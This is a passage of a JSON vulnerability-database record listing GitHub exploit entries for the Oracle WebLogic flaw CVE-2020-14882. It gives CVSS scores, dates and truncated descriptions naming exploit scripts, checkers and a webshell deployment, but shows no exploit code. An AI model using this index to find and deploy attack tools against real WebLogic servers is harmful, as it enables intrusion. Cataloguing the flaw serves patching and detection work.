CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-05-13T22:02:55", "id": "AE4BD3D3-726F-5F95-8DB4-6630F922B00F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:15:33", "description": "(patched as of around 10/30/20)\n# McMaster-University-Blind-Comm...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-29T01:28:41", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2020-12-04T02:16:03", "id": "8A77E3B6-D786-5618-ACC4-555A5D85D5D5", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:17:13", "description": "# CVE-2020-14882\u6279\u91cf\u9a8c\u8bc1 #\r\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-31T01:43:54", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-12-28T09:13:41", "id": "900648E6-9E3A-5883-8D16-DC10AD3DCF6F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-17T05:43:36", "description": "# CVE-2020-14882\nCVE-2020-14882/14883/14750\n\n# USE\n1. clone...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T03:09:13", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-08-17T04:51:16", "id": "E431282E-5250-58B8-B692-7D184D2EFF7E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-27T16:11:32", "description": "# CVE-2020-14882_Exploit_Gui\n\nCVE-2020-14882_Exploit \u652f\u630112.2.X\u548c10...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-07T09:48:49", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-02-27T11:07:48", "id": "C7D1BCF0-3132-5507-B00B-E1843808D5B0", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:12:21", "description": "# cve-2020-14882\nBash script to e...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-29T13:53:31", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-03-18T23:46:12", "id": "CFACBEFA-7243-512E-844E-C19B75303CAA", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:11:54", "description": "Thank you NS-Sp4ce\u3001Jas502n\u3001s1kr10s\u3001demon\u3001\u65af\u6587\nreference\uff1a\nhttps://g...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-09T08:03:44", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-11-16T03:38:04", "id": "693E6A69-453C-50C0-B2B1-91DD65E1D4FF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-15T12:23:46", "description": "# CVE-2020-14882\nCVE-2020\u201314882 - research by Jang\n\nCode by @s1k...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T21:28:12", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-08-15T05:39:24", "id": "C3F26791-EFA4-5899-9702-ACF5F8B70344", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:57:10", "description": "# CVE-2020-14882\n\n\n## coherence shellsession calc.exe\n\n```python...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-30T11:07:11", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-10-10T21:21:34", "id": "C27DDA07-4A5E-56D3-9950-FD5025E1B777", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:12:12", "description": "# cve-2020-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-05T13:12:28", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-07-01T07:17:20", "id": "01A53B41-499A-535B-8021-CB0329633F46", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:56:26", "description": "<b>[CVE-2020-14882] Oracle WebLogic Server Authentication Bypass...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-09T13:02:43", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-08-19T10:39:35", "id": "38ACEE5F-E30D-53CD-B59A-2467D332F915", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-13T20:22:18", "description": "# CVE-2020-14882\u90e8\u7f72\u51b0\u874e\u5185\u5b58\u9a6c\n\n\u4f17\u6240\u5468\u77e5\uff0cCVE-2020-14882\u662f\u4e00\u4e2a\u672a\u6388\u6743\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u8be5\u6f0f\u6d1e\u5728...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-27T06:29:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2022-03-13T15:42:41", "id": "1B25AC3F-FC8A-51FF-BD1B-29BDB73E331D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:12:15", "description": "# CVE-2020-14882 checker\n CVE-2020-14882 detection script\n\nThis ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-03T11:34:38", "type": "githubexploit", "title": "Exploit for CVE-2020-14882", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882"], "modified": "2021-03-18T23:48:22", "id": "EEEBEAEA-A8C9-5187-A9DA-A04745A62CDF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-19T04:14:43", "description": "# CVE-2020\u201314882 Weblogic Unauthorized bypass RCE\n\n## bypass pat...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-28T11:43:37", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882"], "modified": "2022-03-18T22:57:43", "id": "07818DFF-3595-58BA-ABC4-AB5DCCE0B8DD", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:55:52", "description": "# CVE-2020-14882\n\n## Weblogic 10\n![weblogic ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-12T11:27:39", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882", "CVE-2020-2020"], "modified": "2021-07-08T07:02:26", "id": "88E567D7-E197-549F-AE13-65809E68DBB3", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-17T22:08:44", "description": "[CVE-2020-14883] Oracle WebLogic Server Authenticated Remote Cod...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-09T15:26:28", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882", "CVE-2020-14883"], "modified": "2022-02-17T20:33:02", "id": "60F5B96E-ACB6-5D1D-8375-60BADF9503BC", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:04:22", "description": "<h1 align=\"center\" >Welcome to CodeTest</h1>\n\n### :point_right:\u5173...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-30T01:55:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2555", "CVE-2020-14882"], "modified": "2021-11-14T02:41:21", "id": "504A0052-A0EB-53EA-AFC3-4E5EEC236795", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-19T00:36:28", "description": "# Detection of RCE in Oracle's \"WebLogic Server\" CVE-2020-14882 ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-12T06:59:54", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882", "CVE-2020-14750"], "modified": "2022-01-18T23:46:06", "id": "36B6DECF-DB78-5633-9665-AAA8EC3D2A76", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:56:18", "description": "# CVE-2020-14750\nPoC para las vulnerabilidades CVE-2020-14750 y ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-06T12:46:03", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Fusion Middleware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882"], "modified": "2021-12-08T09:11:33", "id": "79D8EEA6-4961-57CD-99C7-A3404C0B5307", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "trendmicroblog": [{"lastseen": "2022-09-14T10:03:34", "description": "This blog entry details how Trend Micro Cloud One\u2122 \u2013 Workload Security and Trend Micro Vision One\u2122 effectively detected and blocked the abuse of the CVE-2020-14882 WebLogic vulnerability in affected endpoints.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-14T00:00:00", "type": "trendmicroblog", "title": "A Post-exploitation Look at Coinminers Abusing WebLogic Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 